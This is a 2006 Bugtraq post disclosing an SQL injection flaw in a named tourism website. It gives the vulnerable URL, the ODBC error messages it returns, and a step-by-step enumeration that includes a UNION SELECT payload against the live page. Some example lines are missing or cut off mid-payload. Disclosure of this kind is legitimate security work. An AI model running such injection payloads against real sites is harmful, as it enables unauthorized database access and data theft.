Bugtraq: SQL Injection in incredibleindia.org

From: <susam_pal_at_yahoo.co.in>
Date: 16 Apr 2006 09:53:43 -0000

('binary' encoding is not supported, stored as-is) Vulnerable Page: http://www.incredibleindia.org/newsite/cms_Page.asp

Found By: Susam Pal

Found On: 29th March, 2006, Wednesday

Vulnerability Type: SQL Injection

Action Taken: Reported to admin_at_incredibleindia.org

Description:

www.incredibleindia.org is a tourism website. The site is prone to SQL injection which can be exploited to reveal the table

names, some column names as well as their data types. Exploiting the vulnerability requires some reverse engineering. The ASP

ODBC error messages can be displayed by passing bad values for the parameters in the URL.

Error Found: Unclosed quotation mark before the character string ' and mncpage.mnccategoryid = mnccategory.mnccategoryid'.

Conclusion: Direct SQL Injection is possible. There are 2 tables, 'mncpage' and 'mnccategory'. Both of them have a column

called 'mnccategoryid'.

Error Found: None

Error Found: The ORDER BY position number 4 is out of range of the number of items in the select list.

Conclusion: The table being used by the query selects 3 columns and one of them is an integer.

Example URL 6: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 union select 'varchar1', 'varchar2', 'varchar3'

from mncpage--

Error Found: Syntax error converting the varchar value 'varchar1' to a column of data type int.

Conclusion: The 1st column in the select query is an integer.

'varchar3' from mncpage--

Error Found: None

Conclusion: The column 'mnccategory' is of integer type.
Received on Apr 19 2006